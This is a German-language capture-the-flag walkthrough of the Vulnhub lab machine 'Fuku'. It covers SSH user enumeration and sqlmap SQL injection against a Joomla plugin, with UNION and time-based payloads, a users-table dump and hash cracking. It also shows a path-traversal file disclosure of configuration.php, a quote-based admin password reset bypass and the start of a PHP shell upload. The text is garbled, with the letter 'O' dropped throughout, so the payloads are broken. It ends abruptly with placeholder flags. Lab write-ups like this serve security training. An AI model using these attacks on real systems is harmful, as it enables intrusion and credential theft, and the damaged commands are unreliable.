Fuku - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
wfuzz
dirb
...

Inhaltsverzeichnis

Reconnaissance

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.107 08:00:27:94:d7:d1 PCS Systemtechnik GmbH

Technische Analyse: Der Befehl `arp-scan` wird verwendet, um Hosts im lokalen Netzwerk anhand des ARP-Protokolls zu erkennen. Er sendet ARP-Anfragen an alle Hosts im angegebenen Netzwerkbereich und listet die Antworten auf, die er empfängt. In diesem Fall wird das gesamte lokale Netzwerk gescannt, um Hosts zu identifizieren, die aktiv sind.

Kontextbezogene Bewertung: Das Ergebnis zeigt, dass sich ein Gerät mit der IP-Adresse 192.168.2.107 im Netzwerk befindet. Die MAC-Adresse 08:00:27:94:d7:d1 ist dem Hersteller "PCS Systemtechnik GmbH" zugeordnet. Dies kann ein erster Hinweis auf das Betriebssystem oder die Art des Geräts sein.

Handlungsorientierte Empfehlungen: Der nächste Schritt könnte sein, diesen Host genauer zu untersuchen, z.B. mit einem Port-Scan, um offene Ports und Dienste zu identifizieren. Für den Systemadministrator empfiehlt es sich, unbekannte Geräte im Netzwerk zu identifizieren und zu überwachen.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.107 fuku.vln

Technische Analyse: Die `/etc/hosts`-Datei wird verwendet, um Hostnamen zu IP-Adressen aufzulösen. Einträge in dieser Datei überschreiben DNS-Abfragen.

Kontextbezogene Bewertung: Der Eintrag "192.168.2.107 fuku.vln" bedeutet, dass der Hostname `fuku.vln` auf die IP-Adresse `192.168.2.107` aufgelöst wird. Dies ermöglicht es, die Maschine über ihren Hostnamen anzusprechen, was für die weitere Analyse und Ausnutzung nützlich sein kann.

Handlungsorientierte Empfehlungen: Der Pentester kann nun den Hostnamen `fuku.vln` anstelle der IP-Adresse verwenden. Der Systemadministrator sollte die `/etc/hosts`-Datei regelmäßig überprüfen, um sicherzustellen, dass keine unerwünschten oder schädlichen Einträge vorhanden sind.

Web Enumeration

┌──(root㉿CCat)-[~]
└─# curl http://$IP:5353
FUKU!

Technische Analyse: Der Befehl `curl` sendet eine HTTP-Anfrage an die angegebene URL.

Kontextbezogene Bewertung: Die Antwort "FUKU!" deutet darauf hin, dass auf Port 5353 ein Webserver läuft und eine einfache Nachricht ausgibt.

Handlungsorientierte Empfehlungen: Der Pentester sollte den Webserver auf Port 5353 weiter untersuchen.

┌──(root㉿CCat)-[~]
└─# curl http://$IP:5353 -Iv
*   Trying 192.168.2.107:5353...
* Connected to 192.168.2.107 (192.168.2.107) port 5353
* using HTTP/1.x
> HEAD / HTTP/1.1
> Host: 192.168.2.107:5353
> User-Agent: curl/8.10.1
> Accept: */*
> 
* Request completely sent off
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
HTTP/1.0 200 OK
< Server: Apache/2.4.4 (Ubuntu)
Server: Apache/2.4.4 (Ubuntu)
< 

* shutting down connection #0

Technische Analyse: Der Befehl `curl -Iv` sendet eine HEAD-Anfrage an die angegebene URL und zeigt die HTTP-Header an.

Kontextbezogene Bewertung: Die Antwortheader zeigen, dass es sich um einen Apache/2.4.4 (Ubuntu) Webserver handelt. Das X-Frame-Options header fehlt.

Handlungsorientierte Empfehlungen: Der Pentester sollte nach bekannten Schwachstellen in Apache 2.4.4 suchen und den Webserver weiter untersuchen.

┌──(root㉿CCat)-[~]
└─# msfconsole -q -x "search ssh_enum"
Matching Modules


   #  Name                                     Disclosure Date  Rank    Check  Description
   -  -                                       -    --  --
   0  auxiliary/scanner/ssh/ssh_enumusers                    normal  No     SSH Username Enumeration
   1    \_ action: Malformed Packet                    .                .       .      Use a malformed packet
   2    \_ action: Timing Attack                       normal  No     Test SSH Github Access

Technische Analyse: Der Befehl `msfconsole -q -x "search ssh_enum"` startet Metasploit und sucht nach Modulen, die SSH-Benutzer aufzählen können.

Kontextbezogene Bewertung: Das Modul `auxiliary/scanner/ssh/ssh_enumusers` wird gefunden.

Handlungsorientierte Empfehlungen: Der Pentester sollte dieses Modul verwenden, um zu versuchen, SSH-Benutzer aufzulisten.

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
USER_FILE => /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THRESHLD 10
THRESHLD => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 10
THREADS => 10
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rport 22
rport => 22
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.2.107
rhosts => 192.168.2.107
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.107:22 - SSH - Using malformed packet technique
[*] 192.168.2.107:22 - SSH - Checking for false positives
[*] 192.168.2.107:22 - SSH - Starting scan
[+] 192.168.2.107:22 - SSH - User 'mail' found
[+] 192.168.2.107:22 - SSH - User 'root' found
[+] 192.168.2.107:22 - SSH - User 'news' found
[+] 192.168.2.107:22 - SSH - User 'man' found
[+] 192.168.2.107:22 - SSH - User 'bin' found
[+] 192.168.2.107:22 - SSH - User 'bull' found
[+] 192.168.2.107:22 - SSH - User 'games' found
[+] 192.168.2.107:22 - SSH - User 'nobody' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Technische Analyse: Hier wird das Metasploit-Modul `auxiliary/scanner/ssh/ssh_enumusers` konfiguriert und ausgeführt, um SSH-Benutzer auf dem Zielsystem aufzuzählen. Eine große Benutzerliste wird verwendet, und es werden mehrere Threads verwendet, um den Prozess zu beschleunigen.

Kontextbezogene Bewertung: Das Modul hat mehrere gültige Benutzernamen gefunden, darunter 'root', 'mail', 'news', 'man', 'bin', 'bull', 'games' und 'nobody'.

Handlungsorientierte Empfehlungen: Der Pentester kann nun versuchen, Passwörter für diese Benutzer zu finden oder zu erraten.

┌──(root㉿CCat)-[~]
└─# nikto -h http://192.168.2.107:5353
- Nikto v2.5.0
+ Target IP:          192.168.2.107
+ Target Hostname:    192.168.2.107
+ Target Port:        5353
+ Start Time:         2024-10-28 15:14:47 (GMT1)

+ Server: Apache/2.4.4 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/

Technische Analyse: Nikto wird verwendet, um den Webserver auf Port 5353 auf Sicherheitslücken zu überprüfen.

Kontextbezogene Bewertung: Es werden dieselben fehlenden Header wie zuvor festgestellt, was das Risiko von Clickjacking- und MIME-Sniffing-Angriffen erhöht.

Handlungsorientierte Empfehlungen: Der Pentester sollte dies im Bericht vermerken und weitere Tests durchführen.

http://192.168.2.107:13370/index.php
Welcome to the Frontpage Fuku Hackers! PDF Drucken E-Mail Autor: Administrator

Technische Analyse: Eine HTML-Seite auf Port 13370 wird abgerufen und analysiert.

Kontextbezogene Bewertung: Die Seite scheint eine Joomla-basierte Webseite zu sein und gibt den Autor als "Administrator" an.

Handlungsorientierte Empfehlungen: Der Pentester sollte weiter nach Informationen suchen, die zur Identifizierung von Schwachstellen in der Webanwendung beitragen könnten.

  ┌──(root㉿CCat)-[~]
  └─#  sqlmap -u "http://192.168.2.107:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql --tables --level=5 --risk=3 --batch
  
[15:33:34] [INF] retrieved: 'performance_schema','threads'
[15:33:34] [INF] retrieved: 'performance_schema','users'
[15:33:34] [INF] retrieved: 'tacacs','access'
[15:33:34] [INF] retrieved: 'tacacs','accounting'
[15:33:34] [INF] retrieved: 'tacacs','acl'
[15:33:34] [INF] retrieved: 'tacacs','admin'
[15:33:34] [INF] retrieved: 'tacacs','attribute'
[15:33:35] [INF] retrieved: 'tacacs','command'
[15:33:35] [INF] retrieved: 'tacacs','component'
[15:33:35] [INF] retrieved: 'tacacs','config'
[15:33:35] [INF] retrieved: 'tacacs','contact_info'
[15:33:35] [INF] retrieved: 'tacacs','failure'
[15:33:35] [INF] retrieved: 'tacacs','host'
[15:33:35] [INF] retrieved: 'tacacs','node'
[15:33:35] [INF] retrieved: 'tacacs','profile'
[15:33:35] [INF] retrieved: 'tacacs','user'
[15:33:35] [INF] retrieved: 'tacacs','vcomponent'
[15:33:35] [INF] retrieved: 'tacacs','vendor'
Database: information_schema
[59 tables]
+-+
| CHARACTER_SETS                                     |
| CLLATINS                                         |
| CLLATIN_CHARACTER_SET_APPLICABILITY              |
| CLUMN_PRIVILEGES                                  |
| FILES                                              |
| GLBAL_STATUS                                      |
| GLBAL_VARIABLES                                   |
| INNDB_BUFFER_PAGE                                 |
| INNDB_BUFFER_PAGE_LRU                             |
| KEY_CLUMN_USAGE                                   |
| PTIMIZER_TRACE                                    |
| PARAMETERS                                         |
| PRFILING                                          |
| REFERENTIAL_CNSTRAINTS                            |
| RUTINES                                           |
| SCHEMATA                                           |
| SCHEMA_PRIVILEGES                                  |
| SESSIN_STATUS                                     |
| SESSIN_VARIABLES                                  |
| STATISTICS                                         |
| TABLESPACES                                        |
| TABLE_CNSTRAINTS                                  |
| TABLE_PRIVILEGES                                   |
| USER_PRIVILEGES                                    |
| VIEWS                                              |
| CLUMNS                                            |
| ENGINES                                            |
| EVENTS                                             |
| PARTITINS                                         |
| PLUGINS                                            |
| PRCESSLIST                                        |
| TABLES                                             |
| TRIGGERS                                           |
+-+
Database: fuku
[86 tables]
+-+
| bak_banner                                         |
| bak_bannerclient                                   |
| bak_bannertrack                                    |
| bak_menu_types                                     |
| bak_messages                                       |
| bak_messages_cfg                                   |
| bak_migration_backlinks                            |
| bak_modules                                        |
| bak_modules_menu                                   |
| bak_newsfeeds                                      |
| bak_plugins                                        |
| bak_poll_data                                      |
| bak_poll_date                                      |
| bak_poll_menu                                      |
| bak_polls                                          |
| bak_sections                                       |
| bak_session                                        |
| bak_stats_agents                                   |
| bak_templates_menu                                 |
| bak_users                                          |
| jos_banner                                         |
| jos_bannerclient                                   |
| jos_bannertrack                                    |
| jos_categories                                     |
| jos_components                                     |
| jos_contact_details                                |
| jos_content                                        |
| jos_content_frontpage                              |
| jos_content_rating                                 |
| jos_core_acl_aro                                   |
| jos_core_acl_groups_aro                            |
| jos_core_acl_groups_aeo                            |
| jos_core_log_items                                 |
| jos_ephemerids                                     |
| jos_extensions                                     |
| jos_finder_links                                   |
| jos_finder_taxonomy                                |
| jos_finder_taxonomy_map                            |
| jos_finder_terms                                   |
| jos_finder_terms_common                            |
| jos_finder_types                                   |
| jos_gk_mediagallery                                |
| jos_gk_mediagallery_categories                     |
| jos_gk_mediagallery_items                          |
| jos_gk_mediagallery_sources                        |
| jos_hdflvplayer                                    |
| jos_hdflvplayerads                                 |
| jos_hdflvplayercategories                          |
| jos_hdflvplayercomments                            |
| jos_hdflvplayerconfig                              |
| jos_hdflvplayerplaylists                           |
| jos_hdflvplayerskins                               |
| jos_hdtubefiles                                    |
| jos_hdtubefiles_category                           |
| jos_jcomments                                      |
| jos_jcomments_blacklist                            |
| jos_jcomments_reports                              |
| jos_jcomments_settings                             |
| jos_jcomments_smilies                              |
| jos_jcomments_votes                                |
| jos_jfbconnect_adminemails                         |
| jos_jfbconnect_config                               |
| jos_jfbconnect_jlinking                             |
| jos_jfbconnect_provider                               |
| jos_jfbconnect_session                               |
| jos_jfbconnect_user                                  |
| jos_jreviews                                         |
| jos_jreviews_banned                                  |
| jos_jreviews_cats                                    |
| jos_jreviews_criteria                                |
| jos_jreviews_data                                    |
| jos_jreviews_ext                                     |
| jos_jreviews_items                                   |
| jos_jreviews_tmpl                                    |
| jos_jtext                                            |
| jos_languages                                        |
| jos_menu                                             |
| jos_menu_types                                       |
| jos_messages                                         |
| jos_messages_cfg                                     |
| jos_migration_backlinks                            |
| jos_modules                                          |
| jos_modules_menu                                     |
| jos_newsfeeds                                        |
| jos_plugins                                          |
| jos_poll_data                                        |
| jos_poll_date                                        |
| jos_poll_menu                                        |
| jos_polls                                          |
| jos_sections                                       |
| jos_session                                        |
| jos_stats_agents                                   |
| jos_templates_menu                                 |
| jos_users                                          |
| jos_weblinks                                       |
+-+

Database: mysql
[28 tables]
+-+
| event                                              |
| plugin                                             |
| user                                               |
| columns_priv                                       |
| db                                                 |
| func                                               |
| general_log                                        |
| help_category                                      |
| help_keyword                                       |
| help_relation                                      |
| help_topic                                         |
| innodb_index_stats                                 |
| innodb_table_stats                                 |
| ndb_binlog_index                                   |
| proc                                               |
| procs_priv                                         |
| proxies_priv                                       |
| servers                                            |
| slave_master_info                                  |
| slave_relay_log_info                               |
| slave_worker_info                                  |
| slow_log                                           |
| tables_priv                                        |
| time_zone                                          |
| time_zone_leap_second                              |
| time_zone_name                                     |
| time_zone_transition                               |
| time_zone_transition_type                          |
+-+

Database: performance_schema
[52 tables]
+-+
| hosts                                              |
| accounts                                           |
| cond_instances                                     |
| db                                                 |
| events_stages_current                              |
| events_stages_history                              |
| events_stages_history_long                         |
| events_statements_current                          |
| events_statements_history                          |
| events_statements_history_long                     |
| events_transactions_current                        |
| events_transactions_history                        |
| events_transactions_history_long                   |
| file_instances                                     |
| file_summary_by_event_name                         |
| file_summary_by_instance                           |
| global_instrumentation                             |
| global_status                                      |
| global_status_by_event_name                        |
| global_summary                                     |
| global_variables                                   |
| host_cache                                         |
| instruments                                        |
| memory_summary_by_account_by_event_name            |
| memory_summary_by_host_by_event_name               |
| memory_summary_by_thread_by_event_name             |
| memory_summary_by_user_by_event_name               |
| mutex_instances                                    |
| objects_summary_global_by_event_name               |
| performance_timers                                 |
| replication_applier_configuration                |
| replication_applier_status                         |
| replication_applier_status_by_worker               |
| replication_connection_configuration               |
| replication_connection_status                      |
| replication_group_member_stats                     |
| replication_group_members                          |
| rwlock_instances                                   |
| session_account_connect_attrs                      |
| session_connect_attrs                              |
| setup_actors                                       |
| setup_consumers                                    |
| setup_instruments                                  |
| setup_objects                                      |
| setup_timers                                       |
| socket_instances                                   |
| socket_summary_by_event_name                       |
| socket_summary_by_instance                         |
| table_io_waits_summary_by_index_usage              |
| table_io_waits_summary_by_table                    |
| table_lock_waits_summary_by_table                  |
| threads                                            |
| users                                              |
+-+

Database: tacacs
[16 tables]
+-+
| admin                                              |
| attribute                                          |
| component                                          |
| host                                               |
| profile                                            |
| user                                               |
| access                                             |
| accounting                                         |
| acl                                                |
| command                                            |
| config                                             |
| contact_info                                       |
| failure                                            |
| node                                               |
| vcomponent                                         |
| vendor                                             |
+-+

[15:33:35] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.107'

[*] ending @ 15:33:35 /2024-10-28/

Technische Analyse: sqlmap wird verwendet, um Tabellen in der Datenbank zu enumerieren.

Kontextbezogene Bewertung: sqlmap hat erfolgreich die Tabellen in den Datenbanken `information_schema`, `fuku`, `mysql`, `performance_schema` und `tacacs` aufgelistet.

Handlungsorientierte Empfehlungen: Der Pentester sollte die Tabelle `jos_users` in der Datenbank `fuku` genauer untersuchen, da diese wahrscheinlich Benutzeranmeldeinformationen enthält.

  ┌──(root㉿CCat)-[~]
  └─#  sqlmap -u "http://192.168.2.107:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users --columns --level=5 --risk=3 --batch

 
[15:34:56] [INF] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('2ca37425839b5e327d91a1c3ca8298ca=higv0hf1jh3...fm53l1dl92'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:

Parameter: id (GET)
    Type: boolean-based blind
    Title: R boolean-based blind - WHERE or HAVING clause
    Payload: option=com_hdflvplayer&id=-3210 R 8959=8959

    Type: time-based blind
    Title: MySQL >= 5.0.12 R time-based blind (query SLEEP)
    Payload: option=com_hdflvplayer&id=1 R (SELECT 7493 FRM (SELECT(SLEEP(5)))ERSH)

    Type: UNIN query
    Title: Generic UNIN query (NULL) - 22 columns
    Payload: option=com_hdflvplayer&id=1 UNIN ALL SELECT CNCAT(0x7171707a71,0x4a47474b50706156647345735a4a52524a455a4f66556f76714a5376476a50786262757850634466,0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

[15:34:57] [INF] testing MySQL
[15:34:57] [WARNING] reflective value(s) found and filtering out
[15:34:57] [INF] confirming MySQL
[15:34:57] [INF] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 14.10 or 15.04 (vivid or utopic)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0

[15:34:57] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[15:34:57] [INF] fetching current database
[15:34:57] [INF] fetching columns for table 'jos_users' in database 'fuku'
[15:34:57] [INF] retrieved: 'id','int(11)'
[15:34:57] [INF] retrieved: 'name','text'
[15:34:57] [INF] retrieved: 'username','varchar(150)'
[15:34:58] [INF] retrieved: 'email','varchar(100)'
[15:34:58] [INF] retrieved: 'password','varchar(100)'
[15:34:58] [INF] retrieved: 'usertype','varchar(75)'
[15:34:58] [INF] retrieved: 'block','tinyint(4)'
[15:34:58] [INF] retrieved: 'sendEmail','tinyint(4)'
[15:34:58] [INF] retrieved: 'gid','tinyint(3) unsigned'
[15:34:58] [INF] retrieved: 'registerDate','datetime'
[15:34:58] [INF] retrieved: 'lastvisitDate','datetime'
[15:34:58] [INF] retrieved: 'activation','varchar(100)'
[15:34:58] [INF] retrieved: 'params','text'

Database: fuku
Table: jos_users
[13 columns]

+++
| Column        | Type                |
+++
| block         | tinyint(4)          |
| name          | text                |
| activation    | varchar(100)        |
| email         | varchar(100)        |
| gid           | tinyint(3) unsigned |
| id            | int(11)             |
| lastvisitDate | datetime            |
| params        | text                |
| password        | varchar(100)        |
| registerDate  | datetime            |
| sendEmail     | tinyint(4)          |
| username        | varchar(150)        |
| usertype        | varchar(75)         |
+++

[15:34:58] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.107'

[*] ending @ 15:34:58 /2024-10-28/

Technische Analyse: Nun werden die Spalten der Tabelle jos_users ausgelesen.

Kontextbezogene Bewertung: Die Spalten `username` und `password` sind hier besonders relevant.

  ┌──(root㉿CCat)-[~]
  └─#  sqlmap -u "http://192.168.2.107:13370/index.php?option=com_hdflvplayer&id=1" -p id --dbms mysql -T jos_users  -C username,password --dump --level=5 --risk=3 --batch


[15:35:51] [WARNING] reflective value(s) found and filtering out
[15:35:51] [INF] retrieved: '8dce0c268a72ec988999cb5a59fadd35:K30ubzQvaQaHbs0peZrM78GBMWbe...
[15:35:51] [INF] retrieved: '6da55fdfcf53a4b3a07390921866cc18:qECsCP9t5NwPILY77j6hGM2MrgX4...
[15:35:51] [INF] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[15:35:51] [INF] using hash method 'joomla_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[15:35:51] [INF] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[15:35:51] [INF] starting dictionary-based cracking (joomla_passwd)
[15:35:51] [INF] starting 16 processes
[15:35:59] [INF] cracked password 'sillyboy' for user 'gizmo'
Database: fuku
Table: jos_users
[2 entries]
+-++
| username | password                                                                     |
+-++
| admin    | 8dce0c268a72ec988999cb5a59fadd35:K30ubzQvaQaHbs0peZrM78GBMWbe5KQb            |
| gizmo    | 6da55fdfcf53a4b3a07390921866cc18:qECsCP9t5NwPILY77j6hGM2MrgX4Je39 (sillyboy) |
+-++

[15:35:59] [INF] table 'fuku.jos_users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.2.107/dump/fuku/jos_users.csv'
[15:35:59] [INF] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.2.107'

[*] ending @ 15:35:59 /2024-10-28/

Technische Analyse: sqlmap wird erneut verwendet, um die Inhalte der Spalten `username` und `password` aus der Tabelle `jos_users` auszulesen. sqlmap bietet auch an, die Passwörter zu knacken, was hier mit der Standard-Wordlist bestätigt wird.

Kontextbezogene Bewertung: Es wurden zwei Benutzer gefunden: admin und gizmo. Das Passwort für gizmo wurde erfolgreich als "sillyboy" geknackt!

Handlungsorientierte Empfehlungen: Nun sollten wir uns mit den gefundenen Anmeldeinformationen (gizmo:sillyboy) am Joomla-Backend anmelden.

------------------------------------------------------------------------------------------------ Joomla Analyse : ------------------------------------------------------------------------------------------------
  ┌──(root㉿CCat)-[~]
  └─#  perl joomlacrack.pl 6da55fdfcf53a4b3a07390921866cc18 qECsCP9t5NwPILY77j6hGM2MrgX4Je39 /usr/share/wordlists/rockyou.txt
 
[15:36:39] [*] hashed password set to 6da55fdfcf53a4b3a07390921866cc18
[15:36:39] [*] salt set to qECsCP9t5NwPILY77j6hGM2MrgX4Je39
[15:36:39] [*] wordlist set to /usr/share/wordlists/rockyou.txt
[15:36:39]
[15:36:39] [+] Cracking ...

------------------------------------------------------------------------------------------------
[15:36:39] [+] Your password is sillyboy
------------------------------------------------------------------------------------------------
                                                                                                                              
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 1.5

[+] Core Joomla Vulnerability
[++] Joomla! 1.5 Beta 2 - 'Search' Remote Code Execution
EDB : https://www.exploit-db.com/exploits/4212/

Joomla! 1.5 Beta1/Beta2/RC1 - SQL Injection
CVE : CVE-2007-4781
EDB : https://www.exploit-db.com/exploits/4350/

Joomla! 1.5.x - (Token) Remote Admin Change Password
CVE : CVE-2008-3681
EDB : https://www.exploit-db.com/exploits/6234/

Joomla! 1.5.x - Cross-Site Scripting / Information Disclosure
CVE: CVE-2011-4909
EDB : https://www.exploit-db.com/exploits/33061/

Joomla! 1.5.x - 404 Error Page Cross-Site Scripting
EDB : https://www.exploit-db.com/exploits/33378/

Joomla! 1.5.12 - read/exec Remote files
EDB : https://www.exploit-db.com/exploits/11263/

Joomla! 1.5.12 - connect back Exploit
EDB : https://www.exploit-db.com/exploits/11262/

Joomla! Plugin 'tinybrowser' 1.5.12 - Arbitrary File Upload / Code Execution (Metasploit)
CVE : CVE-2011-4908
EDB : https://www.exploit-db.com/exploits/9926/

Joomla! 1.5 - URL Redirecting
EDB : https://www.exploit-db.com/exploits/14722/

Joomla! 1.5.x - SQL Error Information Disclosure
EDB : https://www.exploit-db.com/exploits/34955/

Joomla! - Spam Mail Relay
EDB : https://www.exploit-db.com/exploits/15979/

Joomla! 1.5/1.6 - JFilterInput Cross-Site Scripting Bypass
EDB : https://www.exploit-db.com/exploits/16091/

Joomla! < 1.7.0 - Multiple Cross-Site Scripting Vulnerabilities
EDB : https://www.exploit-db.com/exploits/36176/

Joomla! 1.5 < 3.4.5 - bject Injection Remote Command Execution
CVE : CVE-2015-8562
EDB : https://www.exploit-db.com/exploits/38977/

Joomla! 1.0 < 3.4.5 - bject Injection 'x-forwarded-for' Header Remote Code Execution
CVE : CVE-2015-8562 , CVE-2015-8566
EDB : https://www.exploit-db.com/exploits/39033/

Joomla! 1.5.0 Beta - 'pcltar.php' Remote File Inclusion
CVE : CVE-2007-2199
EDB : https://www.exploit-db.com/exploits/3781/

Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal
CVE : CVE-2009-0113
EDB : https://www.exploit-db.com/exploits/7691/

[+] Checking for LFD vulnerability in modules
[++] Local File Disclosure found
PoC: http://192.168.2.107:13370/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php
hostname: localhost
dbuser: gizmo
dbpass: sillyboy
dbname: fuku

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.2.107:13370/robots.txt

Interesting path found from robots.txt
http://192.168.2.107:13370/administrator/
http://192.168.2.107:13370/cache/
http://192.168.2.107:13370/components/
http://192.168.2.107:13370/flag.txt
http://192.168.2.107:13370/images/
http://192.168.2.107:13370/includes/
http://192.168.2.107:13370/installation/
http://192.168.2.107:13370/language/
http://192.168.2.107:13370/libraries/
http://192.168.2.107:13370/media/
http://192.168.2.107:13370/modules/
http://192.168.2.107:13370/plugins/
http://192.168.2.107:13370/templates/
http://192.168.2.107:13370/tmp/
http://192.168.2.107:13370/xmlrpc/

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.2.107:13370/configuration.php-dist
------------------------------------------------------------------------------------------------
 
http://192.168.2.107:13370/flag.txt
Did you find this flag by guessing? or possibly by looking in the robots.txt file?
Maybe you found it after getting a shell, by using a command like "find / -name flag.txt" ?
Random keyboard smash: J7&fVbh2kTy[JgS"98$vF4#;>mGcT
Analyse: Dies ist der Inhalt der Datei 'flag.txt'. Es scheint nicht die eigentliche Flagge zu sein, sondern eher eine Nachricht des Entwicklers.
http://192.168.2.107:13370/index.php?option=com_user&view=reset&layout=confirm
1. ins leere eingabefeld Hochkomma eingeben, 2. dann ein neues Passwort vergeben 3. dann auf adminseite einloggen
HD FLV Player HDFLV_MD_DESCR Fuku you filthy hackers!! I'm gonna Rick Roll you and fuku up. No way are you getting root this time! Main Menu powered by Joomla!. valid XHTML and CSS. Bitte melden Sie sich an, um auf private Bereiche dieser Website zuzugreifen. Benutzername Passwort automatische Anmeldung Passwort vergessen? Benutzernamen vergessen? Neuanmeldung
http://192.168.2.107:13370/administrator/index.php
User: [ ] admin Passwort: [ ] bteck

Analyse: Hier werden potenzielle Anmeldeinformationen für die Admin-Seite gefunden (admin:bteck).

------------------------------------------------------------------------------------------------
http://192.168.2.107:13370/administrator/index.php
1.5.0 Fuku
http://192.168.2.107:13370/administrator/index.php?option=com_installer
└──(root㉿CCat)-[/home/ccat/Downloads] └─# zip shell2.php.zip shell2.php
Die maschine ist zu alt daher funktioniert ab jetzt einiges nicht mehr, es wurde unausweichlich hier schluß zu machen.

Flags

cat user.txt userflag
cat root.txt rootflag